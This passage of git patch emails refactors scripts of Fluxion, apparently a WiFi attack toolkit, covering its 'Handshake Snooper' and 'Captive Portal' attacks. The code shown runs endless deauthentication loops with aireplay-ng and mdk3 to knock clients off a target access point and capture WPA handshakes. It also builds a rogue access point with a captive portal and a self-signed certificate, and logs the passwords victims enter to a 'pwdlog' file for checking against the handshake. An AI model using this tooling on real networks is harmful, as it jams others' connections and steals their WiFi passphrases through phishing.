Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" # Signal parent process the verification terminated. kill -s SIGABRT $1 @@ -142,9 +142,9 @@ handshake_snooper_start_captor() { handshake_snooper_stop_captor - xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" \ + xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $FluxionTargetChannel)" \ $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ - airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor & + airodump-ng --ignore-negative-one -d $FluxionTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $FluxionTargetChannel -a $HandshakeSnooperJammerInterface & local parentPID=$! while [ ! "$HANDSHAKECaptorPID" ]; do @@ -170,27 +170,29 @@ handshake_snooper_start_deauthenticator() { # Prepare deauthenticators case "$HANDSHAKEDeauthenticatorIdentifier" in "$HandshakeSnooperMdk3MethodOption") - echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; + echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; esac # Start deauthenticators. case "$HANDSHAKEDeauthenticatorIdentifier" in "$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ - -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & + -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ + "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" & HANDSHAKEDeauthenticatorPID=$! ;; "$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ - -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & + -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ + "while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" & HANDSHAKEDeauthenticatorPID=$! ;; esac } + handshake_snooper_unset_deauthenticator_identifier() { + if [ ! "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 1; fi HANDSHAKEDeauthenticatorIdentifier="" } @@ -218,7 +220,35 @@ handshake_snooper_set_deauthenticator_identifier() { fi } +handshake_snooper_unset_jammer_interface() { + if [ ! "$HandshakeSnooperJammerInterface" ]; then return 1; fi + HandshakeSnooperJammerInterface="" + + # Check if we're automatically selecting the interface & skip + # this one if so to take the user back properly. + local interfacesAvailable + readarray -t interfacesAvailable < <(attack_targetting_interfaces) + + if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi +} + +handshake_snooper_set_jammer_interface() { + if [ "$HandshakeSnooperJammerInterface" ]; then return 0; fi + if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ + "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi + + echo "Running get interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces; then + echo "Failed to get interface" > $FLUXIONOutputDevice + return 1 + fi + + echo "Succeeded get interface." > $FLUXIONOutputDevice + HandshakeSnooperJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} +} + handshake_snooper_unset_verifier_identifier() { + if [ ! "$HANDSHAKEVerifierIdentifier" ]; then return 1; fi HANDSHAKEVerifierIdentifier="" } @@ -249,6 +279,7 @@ handshake_snooper_set_verifier_identifier() { } handshake_snooper_unset_verifier_interval() { + if [ ! "$HANDSHAKEVerifierInterval" ]; then return 1; fi HANDSHAKEVerifierInterval="" } @@ -275,6 +306,7 @@ handshake_snooper_set_verifier_interval() { } handshake_snooper_unset_verifier_synchronicity() { + if [ ! "$HANDSHAKEVerifierSynchronicity" ]; then return 1; fi HANDSHAKEVerifierSynchronicity="" } @@ -370,22 +402,22 @@ prep_attack() { # I've reported the bug, we can add it when fixed. local sequence=( "set_deauthenticator_identifier" + "set_jammer_interface" "set_verifier_identifier" "set_verifier_interval" "set_verifier_synchronicity" ) - if fluxion_do_sequence handshake_snooper sequence[@]; then - HandshakeSnooperState="Ready" - else - unprep_attack + if ! fluxion_do_sequence handshake_snooper sequence[@]; then return 1 fi + + HandshakeSnooperState="Ready" } stop_attack() { if [ "$HANDSHAKEArbiterPID" ]; then - kill -s SIGABRT $HANDSHAKEArbiterPID &>$FLUXIONOutputDevice + kill -s SIGABRT $HANDSHAKEArbiterPID &> $FLUXIONOutputDevice fi HANDSHAKEArbiterPID="" diff --git a/fluxion b/fluxion index 26729a8..f52bb1e 100755 --- a/fluxion +++ b/fluxion @@ -565,7 +565,7 @@ fluxion_do_sequence() { while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then if ! fluxion_undo $__fluxion_do_sequence__namespace; then - break + return -2 fi # Synchronize the current instruction's index by checking last. diff --git a/language/en.sh b/language/en.sh index a3e6c83..eed0268 100755 --- a/language/en.sh +++ b/language/en.sh @@ -21,6 +21,14 @@ FLUXIONPhysicalWIDeviceUnknownError="${CRed}Unable to determine interface's phys FLUXIONStartingWIMonitorNotice="Starting monitor interface..." FLUXIONInterfaceAllocatedNotice="${CGrn}Interface allocation succeeded!" FLUXIONInterfaceAllocationFailedError="${CRed}Interface reservation failed!" + + +FLUXIONIncompleteTargettingInfoNotice="Missing essid, bssid, or channel information!" + +FLUXIONTargettingAccessPointAboveNotice="Fluxion is targetting the access point above." + +FLUXIONContinueWithTargetQuery="Continue with this target?" + # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starting scanner, please wait..." FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the FLUXION Scanner." @@ -61,7 +69,7 @@ FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Select a wireless attack for the access point" -FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr attack in progress..." +FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr attack in progress..." FLUXIONSelectAnotherAttackOption="Select another attack" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONGeneralBackOption="${CRed}Back" From cdbce5dbf62e51e6b67ffc5049c85be66df19213 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 15:26:04 -0600 Subject: [PATCH 17/45] Fixed minor bugs caused by obsolecense. --- attacks/Handshake Snooper/attack.sh | 15 ++++++++++----- attacks/Handshake Snooper/language/en.sh | 2 ++ fluxion | 19 +++++++++++++------ 3 files changed, 25 insertions(+), 11 deletions(-) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 283fa15..1f6003c 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -237,13 +237,14 @@ handshake_snooper_set_jammer_interface() { if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi - echo "Running get interface." > $FLUXIONOutputDevice - if ! fluxion_get_interface attack_targetting_interfaces; then - echo "Failed to get interface" > $FLUXIONOutputDevice + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$HandshakeSnooperJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice return 1 fi - echo "Succeeded get interface." > $FLUXIONOutputDevice + echo "Succeeded get jammer interface." > $FLUXIONOutputDevice HandshakeSnooperJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} } @@ -345,7 +346,9 @@ if [ ! "$HandshakeSnooperCLIArguments" ]; then --longoptions="verifier:,interval:,jammer:,asynchronous" \ --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@" ); then - echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 10 + echo -e "${CRed}Aborted$CClr, parameter error detected..." + sleep 5 + fluxion_handle_exit fi declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments @@ -371,6 +374,7 @@ while [ "$1" != "" -a "$1" != "--" ]; do shift # Shift new parameters done + # ============================================================ # # ===================== < Fluxion Hooks > ==================== # # ============================================================ # @@ -388,6 +392,7 @@ unprep_attack() { handshake_snooper_unset_verifier_synchronicity handshake_snooper_unset_verifier_interval handshake_snooper_unset_verifier_identifier + handshake_snooper_unset_jammer_interface handshake_snooper_unset_deauthenticator_identifier sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" diff --git a/attacks/Handshake Snooper/language/en.sh b/attacks/Handshake Snooper/language/en.sh index abf241a..23823e5 100755 --- a/attacks/Handshake Snooper/language/en.sh +++ b/attacks/Handshake Snooper/language/en.sh @@ -2,6 +2,8 @@ # identifier: Handshake Snopper # description: Acquires WPA/WPA2 encryption hashes. + +HandshakeSnooperJammerInterfaceQuery="Select an interface for jamming." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HandshakeSnooperMethodQuery="Select a method of handshake retrieval" HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passive$CClr)" diff --git a/fluxion b/fluxion index f52bb1e..af2cea5 100755 --- a/fluxion +++ b/fluxion @@ -583,7 +583,7 @@ fluxion_do_sequence() { fi __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[$__fluxion_do_sequence__instructionIndex]} - echo "Next Instruction: $__fluxion_do_sequence__instruction" \ + echo "Running next: $__fluxion_do_sequence__instruction" \ > $FLUXIONOutputDevice done } @@ -865,6 +865,12 @@ fluxion_allocate_interface() { # Reserve interfaces fluxion_get_interface() { if ! type -t "$1" &> /dev/null; then return 1; fi + if [ "$2" ]; then + local -r interfaceQuery="$2" + else + local -r interfaceQuery=$FLUXIONInterfaceQuery + fi + while true; do local interfacesAvailable readarray -t interfacesAvailable < <($1) @@ -923,7 +929,7 @@ fluxion_get_interface() { "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" io_query_format_fields \ - "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ + "$FLUXIONVLine $interfaceQuery" "$FormatApplyAutosize" \ interfacesAvailableColor[@] interfacesAvailable[@] \ interfacesAvailableState[@] interfacesAvailableInfo[@] @@ -1163,7 +1169,7 @@ fluxion_get_target() { # shit'll hit the fan and we'll have an extremly distressed user. # Replacing ' ', '/', '.', '~', '\' with '_' FluxionTargetSSIDClean=$( - echo "$FLUXIONGetTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' ) # We'll change a single hex digit from the target AP's MAC address. @@ -1214,7 +1220,7 @@ fluxion_hash_verify() { echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" echo - fluxion_show_ap_info + fluxion_target_show \ "$hashESSID" \ "$hashEncryption" \ "$hashChannel" \ @@ -1264,6 +1270,7 @@ fluxion_hash_verify() { } fluxion_hash_unset_path() { + if [ ! "$FluxionHashPath" ]; then return 1; fi FluxionHashPath="" } @@ -1333,12 +1340,12 @@ fluxion_hash_set_path() { } # Paramters: -fluxion_hash_get() { +fluxion_hash_get_path() { # Assure we've got the bssid and the essid passed in. if [ ${#@} -lt 2 ]; then return 1; fi while true; do - if ! fluxion_hash_set_path "$1"; then return $?; fi + if ! fluxion_hash_set_path "$@"; then return $?; fi if fluxion_hash_verify "$FluxionHashPath" "${@:1}"; then break; From 065bec6b0f09a5c62c827770cf9696c7b500d40a Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 15:29:05 -0600 Subject: [PATCH 18/45] Started upgrading the Captive Portal attack. Rewrote sections of the script to follow the coding style guide closer. Implemented and adapted attack requirements for Fluxion v4. Implemented the script loop using the sequencing framework. Updated usage of old services to new, including global identifiers. Implemented and added command line interface flag control. Some refactoring & removing outdated code. --- attacks/Captive Portal/attack.sh | 757 ++++++++++++++------------ attacks/Captive Portal/language/en.sh | 2 + language/en.sh | 6 +- 3 files changed, 425 insertions(+), 340 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 1f31b2f..c792ec9 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1,221 +1,211 @@ #!/bin/bash -############################# < Captive Portal Parameters > ############################ +# ============================================================ # +# =============== < Captive Portal Parameters > ============== # +# ============================================================ # CaptivePortalState="Not Ready" CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog" CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog" -CaptivePortalJamTime="9999999999999" -CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") -CaptivePortalAuthenticationMethodsInfo=("(handshake file, ${CGrn}recommended$CClr)") # "(Target AP authentication, slow)") +CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") +CaptivePortalAuthenticationMethodsInfo=( + "(handshake file, ${CGrn}recommended$CClr)" +) # "(Target AP authentication, slow)") -########################### < Virtual Network Configuration > ########################## -# To avoid collapsing with an already connected network, we'll use an uncommon network. -VIGWAddress="192.168.254.1" -VIGWNetwork=${VIGWAddress%.*} +# ============= < Virtual Network Configuration > ============ # +# To avoid collapsing with an already existing network, +# we'll use a somewhat uncommon network and server IP. +CaptivePortalVIGWAddress="192.168.254.1" +CaptivePortalVIGWNetwork=${CaptivePortalVIGWAddress%.*} -function captive_portal_run_interface() { - if [ ! "$1" ]; then return 1; fi - # Create an identifier for the access point, AP virtual interface. - local wiAccessPoint="FX${1:2}AP" +# ============================================================ # +# ============== < Captive Portal Subroutines > ============== # +# ============================================================ # +captive_portal_unset_jammer_interface() { + if [ ! "$CaptivePortalJammerInterface" ]; then return 1; fi + CaptivePortalJammerInterface="" - # Find interface's physical device. - if ! interface_physical "$1"; then - echo -e "$FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError" - sleep 5 + # Check if we're automatically selecting the interface & skip + # this one if so to take the user back properly. + local interfacesAvailable + readarray -t interfacesAvailable < <(attack_targetting_interfaces) + + if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi +} + +captive_portal_set_jammer_interface() { + if [ "$CaptivePortalJammerInterface" ]; then return 0; fi + + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$CaptivePortalJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice return 1 fi - local wiAccessPointDevice="$InterfacePhysical" - - # Create the new virtual interface with the generated identifier. - echo -e "$FLUXIONVLine $CaptivePortalStartingInterfaceNotice" - if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2>$FLUXIONOutputDevice; then - echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" - sleep 5 - return 3 - fi - - echo -e "$FLUXIONVLine $CaptivePortalStartedInterfaceNotice" - sleep 3 - - CaptivePortalRunInterface="$wiAccessPoint" + echo "Succeeded get jammer interface." > $FLUXIONOutputDevice + CaptivePortalJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} } -function captive_portal_unset_interface() { - if [ ! "$WIAccessPoint" ]; then return 1; fi - - if interface_is_wireless "$WIAccessPoint"; then fluxion_unset_ap_service - fi - - if [ "$WIAccessPoint" = "FX${WIMonitor:2}AP" ]; then - # Remove any previously created fluxion AP interfaces. - iw dev "$WIAccessPoint" del &>$FLUXIONOutputDevice - fi - - WIAccessPoint="" +captive_portal_ap_interfaces() { + interface_list_all + local interface + for interface in "${InterfaceListAll[@]}"; do + if [ "$interface" = "lo" ]; then continue; fi + echo "$interface" + done } -function captive_portal_set_interface() { - if [ "$WIAccessPoint" ]; then return 0; fi +captive_portal_unset_ap_interface() { + if [ ! "$CaptivePortalAPInterface" ]; then return 1; fi + CaptivePortalAPInterface="" +} - captive_portal_unset_interface +captive_portal_set_ap_interface() { + if [ "$CaptivePortalAPInterface" ]; then return 0; fi - # Gather candidate interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingWINotice" - - # List of all valid network interfaces. - interface_list_real - - local ifAlternate=("$FLUXIONGeneralRepeatOption" "$FLUXIONGeneralBackOption") - local ifAlternateInfo=("" "") - local ifAlternateState=("" "") - local ifAlternateColor=("$CClr" "$CClr") - - interface_prompt "$FLUXIONVLine $CaptivePortalInterfaceQuery" InterfaceListReal[@] \ - ifAlternate[@] ifAlternateInfo[@] ifAlternateState[@] ifAlternateColor[@] - - case "$InterfacePromptIfSelected" in - "$FLUXIONGeneralBackOption") - captive_portal_unset_interface + echo "Running get ap interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface captive_portal_ap_interfaces \ + "$CaptivePortalAPInterfaceQuery"; then + echo "Failed to get ap interface" > $FLUXIONOutputDevice return 1 - ;; - - # If the monitor interface is also the AP interface, - # there's no need to reserve it again, just add it. - "$WIMonitor") - if ! captive_portal_run_interface "$InterfacePromptIfSelected"; then return 1 - fi - - WIAccessPoint="$CaptivePortalRunInterface" - ;; - *) - # We'll only attempt to run wireless interfaces for now. - # The conditional below is a temporary fix for ethernet interfaces. - # TODO: Fix fluxion_run_interface to accept non-wireless interfaces. - if interface_is_wireless "$InterfacePromptIfSelected"; then - if ! fluxion_run_interface "$InterfacePromptIfSelected"; then return 2 - fi - - WIAccessPoint="$FluxionRunInterface" - else - WIAccessPoint="$InterfacePromptIfSelected" - fi - ;; - esac - - VIGW=$WIAccessPoint - VIAP=$WIAccessPoint - - # Set an AP service if the interface selected is wireless. - if interface_is_wireless "$WIAccessPoint"; then - if ! fluxion_set_ap_service; then - captive_portal_unset_interface - return 1 - fi fi + + echo "Succeeded get ap interface." > $FLUXIONOutputDevice + CaptivePortalAPInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} } -function captive_portal_unset_auth() { - if [ ! "$APRogueAuthMode" ]; then return 0; fi +captive_portal_unset_authenticator() { + if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi - case "$APRogueAuthMode" in - "hash") fluxion_unset_hash ;; + case "$CaptivePortalAuthenticatorMode" in + "hash") fluxion_unset_hash ;; esac - APRogueAuthMode="" + CaptivePortalAuthenticatorMode="" # If we've only got one option, then the user skipped this section # by auto-selecting that single option, so we unset the previous # phase along with this one to properly take the user back. if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then - captive_portal_unset_interface + return 1 # Trigger undo chain because it was auto-selected. fi } -function captive_portal_set_auth() { - if [ "$APRogueAuthMode" ]; then - echo "Captive Portal authentication mode is already set, skipping!" >$FLUXIONOutputDevice +captive_portal_set_authenticator() { + if [ "$CaptivePortalAuthenticatorMode" ]; then + echo "Captive Portal authentication mode is already set, skipping!" \ + > $FLUXIONOutputDevice return 0 fi - captive_portal_unset_auth + captive_portal_unset_authenticator # If we've got only one choice, auto-select it for the user. - if [ ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ - ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a "$FLUXIONAuto" ]; then - APRogueAuthMode="${CaptivePortalAuthenticationMethods[0]}" - echo "Auto-selected authentication method: $APRogueAuthMode" >$FLUXIONOutputDevice + if [ \ + ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ + ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \ + "$FLUXIONAuto" ]; then + CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}" + echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \ + > $FLUXIONOutputDevice else fluxion_header echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" echo - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" + fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ + "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker" - local choices=("${CaptivePortalAuthenticationMethods[@]}" "$FLUXIONGeneralBackOption") - io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" choices[@] \ - CaptivePortalAuthenticationMethodsInfo[@] + local choices=( + "${CaptivePortalAuthenticationMethods[@]}" + "$FLUXIONGeneralBackOption" + ) + io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \ + choices[@] CaptivePortalAuthenticationMethodsInfo[@] echo - APRogueAuthMode="${IOQueryFormatFields[0]}" + CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}" # If we're going back, reset everything and abort. - if [[ "$APRogueAuthMode" == "$FLUXIONGeneralBackOption" ]]; then - captive_portal_unset_auth - return 1 + if [[ \ + "$CaptivePortalAuthenticatorMode" == \ + "$FLUXIONGeneralBackOption" ]]; then + captive_portal_unset_authenticator + return -1 fi fi # Process the authentication method selected. - captive_portal_set_auth_processingResult=1 # Assume failure. - case "$APRogueAuthMode" in - "hash") - fluxion_set_hash - captive_portal_set_auth_processingResult=$? - ;; + local result=1 # Assume failure at first. + case "$CaptivePortalAuthenticatorMode" in + "hash") + # Pass default path if no path is set yet. + if [ ! "$CaptivePortalHashPath" ]; then + CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" + fi + + fluxion_hash_get_path \ + "$CaptivePortalHashPath" "$FluxionTargetMAC" "$FluxionTargetSSID" + result=$? + + if [ $result -eq 0 ]; then + CaptivePortalHashPath="$FluxionHashPath" + fi + ;; esac - # Assure authentication method processing was successful, abort otherwise. - if [[ $captive_portal_set_auth_processingResult -ne 0 ]]; then - captive_portal_unset_auth + # Assure authentication method processing succeeded, abort otherwise. + if [[ $result -ne 0 ]]; then + echo "Auth-mode error code $result!" > $FLUXIONOutputPath return 1 fi } -function captive_portal_run_certificate_generator() { - xterm -bg "#000000" -fg "#CCCCCC" -title "Generating Self-Signed SSL Certificate" -e openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout "$FLUXIONWorkspacePath/server.pem" -out "$FLUXIONWorkspacePath/server.pem" # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html +captive_portal_run_certificate_generator() { + xterm -bg "#000000" -fg "#CCCCCC" \ + -title "Generating Self-Signed SSL Certificate" -e openssl req \ + -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' \ + -new -newkey rsa:2048 -days 365 -nodes -x509 \ + -keyout "$FLUXIONWorkspacePath/server.pem" \ + -out "$FLUXIONWorkspacePath/server.pem" + # Details -> https://www.openssl.org/docs/manmaster/apps/openssl.html chmod 400 "$FLUXIONWorkspacePath/server.pem" } -function captive_portal_unset_cert() { +captive_portal_unset_certificate() { + if [ ! "$CaptivePortalSSL" ]; then return 1; fi sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="" } # Create Self-Signed SSL Certificate -function captive_portal_set_cert() { +captive_portal_set_certificate() { if [ "$CaptivePortalSSL" ]; then - echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" >$FLUXIONOutputDevice + echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" \ + > $FLUXIONOutputDevice return 0 fi - captive_portal_unset_cert + captive_portal_unset_certificate - # Check for existance of ssl certificate within fluxion with file size > 0 - # If a certificate exists, it's user supplied (fancy), copy it to fluxspace. - if [ -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \ - -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" ]; then + # Check existance of ssl certificate within fluxion with file size > 0 + # If user-supplied (fancy) certificate exists, copy it to fluxspace. + if [ \ + -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \ + -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ + ]; then cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="enabled" # Must be enabled if sourcing own certificate - echo "Captive Portal certificate was user supplied, skipping query!" >$FLUXIONOutputDevice + echo "Captive Portal certificate was user supplied, skipping query!" \ + > $FLUXIONOutputDevice return 0 fi @@ -227,81 +217,90 @@ function captive_portal_set_cert() { fi CaptivePortalSSL="enabled" else - local choices=("$CaptivePortalCertificateSourceGenerateOption" "$CaptivePortalCertificateSourceRescanOption" "$CaptivePortalCertificateSourceDisabledOption" "$FLUXIONGeneralBackOption") + local choices=( + "$CaptivePortalCertificateSourceGenerateOption" + "$CaptivePortalCertificateSourceRescanOption" + "$CaptivePortalCertificateSourceDisabledOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$CaptivePortalCertificateSourceQuery" choices[@] echo case "$IOQueryChoice" in - "$CaptivePortalCertificateSourceGenerateOption") - # If cert generator fails, gtfo, something broke! - if ! captive_portal_run_certificate_generator; then - fluxion_conditional_bail "cert-gen failed!" + "$CaptivePortalCertificateSourceGenerateOption") + # If cert generator fails, gtfo, something broke! + if ! captive_portal_run_certificate_generator; then + fluxion_conditional_bail "cert-gen failed!" + return 2 + fi + CaptivePortalSSL="enabled" + ;; + + "$CaptivePortalCertificateSourceRescanOption") + captive_portal_set_certificate + return $? + ;; + + "$CaptivePortalCertificateSourceDisabledOption") + CaptivePortalSSL="disabled" + ;; + + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown cert-gen option!" return 2 - fi - CaptivePortalSSL="enabled" - ;; - - "$CaptivePortalCertificateSourceRescanOption") - captive_portal_set_cert - return $? - ;; - - "$CaptivePortalCertificateSourceDisabledOption") - captive_portal_unset_cert - CaptivePortalSSL="disabled" - ;; - - "$FLUXIONGeneralBackOption") - captive_portal_unset_cert - return 1 - ;; - *) - fluxion_conditional_bail "Unknown cert-gen option!" - return 2 - ;; + ;; esac fi } -function captive_portal_unset_conn() { +captive_portal_unset_connectivity() { + if [ ! "$CaptivePortalConnectivity" ]; then return 1; fi CaptivePortalConnectivity="" } -function captive_portal_set_conn() { +captive_portal_set_connectivity() { if [ "$CaptivePortalConnectivity" ]; then return 0; fi - captive_portal_unset_conn + captive_portal_unset_connectivity - local choices=("$CaptivePortalConnectivityDisconnectedOption" "$CaptivePortalConnectivityEmulatedOption" "$FLUXIONGeneralBackOption") + local choices=( + "$CaptivePortalConnectivityDisconnectedOption" + "$CaptivePortalConnectivityEmulatedOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$CaptivePortalConnectivityQuery" choices[@] case "$IOQueryChoice" in - "$CaptivePortalConnectivityDisconnectedOption") CaptivePortalConnectivity="disconnected" ;; - "$CaptivePortalConnectivityEmulatedOption") CaptivePortalConnectivity="emulated" ;; - "$FLUXIONGeneralBackOption") - captive_portal_unset_conn - return 1 - ;; - *) - fluxion_conditional_bail "Unknown connectivity option!" - return 2 - ;; + "$CaptivePortalConnectivityDisconnectedOption") + CaptivePortalConnectivity="disconnected" ;; + "$CaptivePortalConnectivityEmulatedOption") + CaptivePortalConnectivity="emulated" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown connectivity option!" + return 2 + ;; esac } -function captive_portal_unset_site() { - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" +captive_portal_unset_user_interface() { + if [ -z "$CaptivePortalUserInterface" -o \ + ! -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 1; fi + CaptivePortalUserInterface="" } -function captive_portal_set_site() { - if [ -d "$FLUXIONWorkspacePath/captive_portal" ]; then - echo "Captive Portal site (interface) is already set, skipping!" >$FLUXIONOutputDevice - return 0 - fi +captive_portal_set_user_interface() { + if [ "$CaptivePortalUserInterface" != "" -a \ + -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 0; fi - captive_portal_unset_site + captive_portal_unset_portal local sites=() @@ -334,7 +333,8 @@ function captive_portal_set_site() { echo - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" + fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ + "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker" io_query_format_fields "" "$queryFieldOptionsFormat\n" \ sitesIdentifier[@] sitesLanguage[@] @@ -346,39 +346,27 @@ function captive_portal_set_site() { local sitePath="${site}_${siteLanguage}" case "$site" in - "$CaptivePortalGenericInterfaceOption") - source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang" - captive_portal_generic - ;; - "$FLUXIONGeneralBackOption") - captive_portal_unset_site - return 1 - ;; - *) - cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$sitePath.portal" \ - "$FLUXIONWorkspacePath/captive_portal" - - find 